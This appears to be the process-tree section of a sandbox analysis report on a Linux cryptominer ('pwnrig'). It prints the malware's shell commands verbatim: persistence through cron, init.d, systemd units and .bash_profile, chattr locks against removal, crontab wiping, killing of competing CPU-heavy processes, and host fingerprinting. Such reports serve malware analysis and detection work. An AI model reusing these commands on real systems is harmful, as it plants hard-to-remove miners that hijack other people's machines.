-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:3029
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3030
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3030
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3030
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3030
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:3030
-
-
/bin/systemctlsystemctl daemon-reload5⤵PID:3030
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:3051
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3052
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3052
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3052
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3052
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:3052
-
-
/bin/systemctlsystemctl daemon-reload5⤵PID:3052
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵PID:3073
-
-
/usr/bin/whichwhich systemctl4⤵PID:3074
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:3075
-
-
/bin/rmrm -rf /bin/sysdr4⤵PID:3076
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
PID:3077
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
PID:3079
-
-
/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Attempts to change immutable files
PID:3080
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:3081
-
-
/bin/systemctlsystemctl enable pwnrige.service4⤵PID:3082
-
-
/bin/systemctlsystemctl enable pwnrigl.service4⤵PID:3103
-
-
/bin/systemctlsystemctl daemon-reload4⤵PID:3124
-
-
/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵PID:3145
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:3187 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:3211
-
/usr/bin/whoamiwhoami4⤵PID:3222
-
-
/bin/hostnamehostname4⤵PID:3223
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3224
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3240
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3242
-
-
/bin/psps -A "-ostat,ppid"4⤵
- Reads runtime system information
PID:3241
-
-
/usr/bin/idid -u4⤵PID:3244
-
-
/bin/grepgrep -v grep4⤵PID:3247
-
-
/bin/grepgrep /etc/cron4⤵PID:3246
-
-
/bin/psps x4⤵
- Reads CPU attributes
PID:3245
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3249
-
/usr/bin/idid -u4⤵PID:3250
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:3255
-
-
/bin/grepgrep -v /usr/sbin/httpd4⤵PID:3254
-
-
/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:3253
-
-
/bin/grepgrep -v grep4⤵PID:3252
-
-
/bin/psps aux4⤵
- Reads runtime system information
PID:3251
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵PID:3257
-
/usr/bin/idid -u4⤵PID:3258
-
-
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3265
-
-
/usr/bin/crontabcrontab -r2⤵PID:3272
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads runtime system information
PID:3273
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads runtime system information
PID:3274
-
-
/bin/bashbash -c "echo \"* * * * * /opt/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:3275
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:3277
-
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib42⤵PID:3278
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵PID:3279
-
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib42⤵PID:3280
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:3281
-
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib42⤵PID:3282
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵
- Attempts to change immutable files
PID:3283
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib42⤵
- Attempts to change immutable files
PID:3284
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵PID:3285
-
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib42⤵PID:3286
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵PID:3287
-
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib42⤵PID:3288
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵
- Attempts to change immutable files
PID:3289
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵PID:3290
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵PID:3291
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3292
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:3293 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:3294
-
/usr/bin/whoamiwhoami4⤵PID:3305
-
-
/bin/hostnamehostname4⤵PID:3306
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3307
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3323
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3325
-
-
/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Reads runtime system information
PID:3324
-
-
/usr/bin/idid -u4⤵PID:3327
-
-
/bin/grepgrep -v grep4⤵PID:3330
-
-
/bin/grepgrep /etc/cron4⤵PID:3329
-
-
/bin/psps x4⤵
- Reads runtime system information
PID:3328
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- Attempts to change immutable files
- Writes file to tmp directory
PID:3332 -
/usr/bin/idid -u4⤵PID:3333
-
-
/usr/bin/idid -u4⤵PID:3334
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵PID:3335
-
-
/bin/rmrm -rf /bin/bprofr4⤵PID:3336
-
-
/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:3337
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
PID:3338
-
-
/usr/bin/idid -u4⤵PID:3339
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:3340
-
-
/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:3341
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:3342
-
-
/bin/rmrm -rf /bin/crondr4⤵PID:3343
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
PID:3344
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:3346
-
-
/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:3347
-
-
/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:3348
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:3349
-
-
/usr/bin/whichwhich chkconfig4⤵PID:3350
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:3351
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
PID:3352
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
PID:3353 -
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3354
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3354
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3354
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3354
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:3354
-
-
/bin/systemctlsystemctl daemon-reload5⤵PID:3354
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:3375
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3376
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3376
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3376
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3376
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:3376
-
-
/bin/systemctlsystemctl daemon-reload5⤵PID:3376
-
-
-
/bin/rmrm -rf /bin/initdr4⤵PID:3397
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
PID:3398
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:3400
-
-
/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:3401
-
-
/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵PID:3402
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:3403
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3404
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3404
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3404
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3404
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:3404
-
-
/bin/systemctlsystemctl daemon-reload5⤵PID:3404
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:3425
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3426
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3426
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3426
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3426
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:3426
-
-
/bin/systemctlsystemctl daemon-reload5⤵
- Reads runtime system information
PID:3426
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵PID:3447
-
-
/usr/bin/whichwhich systemctl4⤵PID:3448
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:3449
-
-
/bin/rmrm -rf /bin/sysdr4⤵PID:3450
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
PID:3451
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
PID:3453
-
-
/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵PID:3454
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
- Attempts to change immutable files
PID:3455
-
-
/bin/systemctlsystemctl enable pwnrige.service4⤵PID:3456
-
-
/bin/systemctlsystemctl enable pwnrigl.service4⤵PID:3477
-
-
/bin/systemctlsystemctl daemon-reload4⤵PID:3498
-
-
/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵PID:3519
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:3561 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:3585
-
/usr/bin/whoamiwhoami4⤵PID:3598
-
-
/bin/hostnamehostname4⤵PID:3599
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3600
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3616
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3618
-
-
/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Reads runtime system information
PID:3617
-
-
/usr/bin/idid -u4⤵PID:3620
-
-
/bin/grepgrep /etc/cron4⤵PID:3622
-
-
/bin/grepgrep -v grep4⤵PID:3623
-
-
/bin/psps x4⤵PID:3621
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3625
-
/usr/bin/idid -u4⤵PID:3626
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:3631
-
-
/bin/grepgrep -v /usr/sbin/httpd4⤵PID:3630
-
-
/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:3629
-
-
/bin/grepgrep -v grep4⤵PID:3628
-
-
/bin/psps aux4⤵
- Reads CPU attributes
- Reads runtime system information
PID:3627
-
-
-
